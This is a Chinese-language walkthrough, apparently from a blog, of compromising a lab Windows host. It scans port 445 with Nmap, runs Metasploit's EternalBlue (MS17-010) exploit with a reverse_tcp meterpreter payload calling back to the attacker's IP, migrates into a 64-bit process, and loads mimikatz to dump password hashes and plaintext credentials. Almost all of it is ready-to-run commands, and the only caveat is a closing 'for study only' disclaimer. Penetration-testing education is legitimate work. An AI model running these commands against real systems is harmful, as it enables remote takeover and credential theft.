第一步:使用Nmap掃描目標主機開放端口
要知道ms17010是對445端口進行攻擊的,所以我們要先對目標機進行端口掃描
nmap 192.168.48.110
第二步:獲取權限
在這裏我們利用ms17010(永恆之藍)漏洞來獲取靶機的權限。
運行msf,使用ms17010漏洞。
msf5 > use exploit/windows/smb/ms17_010_eternalblue
接下來show options查看需要配置的參數
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
剩下的就是需要我們設置LHOST、RHOST、payload,分別是攻擊機IP、靶機IP、攻擊載荷。
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1 //攻擊機ip
lhost => 192.168.48.1
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110 //靶機ip
rhost => 192.168.48.110
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻擊載荷
payload => windows/x64/meterpreter/reverse_tcp
一切配置完畢後開始攻擊
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
這裏可以看到我們已經攻擊成功了,拿到了靶機的shell。
拿到權限後先不要着急幹別的,這裏我們最好先進行進程遷移,確保我們的msf程序在目標機上不會受到干擾
先使用ps命令查看進程
meterpreter > ps
因爲我們是64位操作系統,所以我們選擇遷移到64位的進程上。
meterpreter > migrate 516 //這裏的516是PID,就是進程ID
第三步:使用mimikatz模塊獲取目標機明文密碼
使用mimikatz模塊
meterpreter > load mimikatz
獲取靶機密碼哈希
meterpreter > msv
獲取靶機明文密碼
meterpreter > kerberos
到這裏攻擊就結束了,成功拿到了目標機的明文賬戶密碼。
注:本文僅供參考學習,請勿在網上搞破壞,觸犯法律者應承擔相應的法律責任!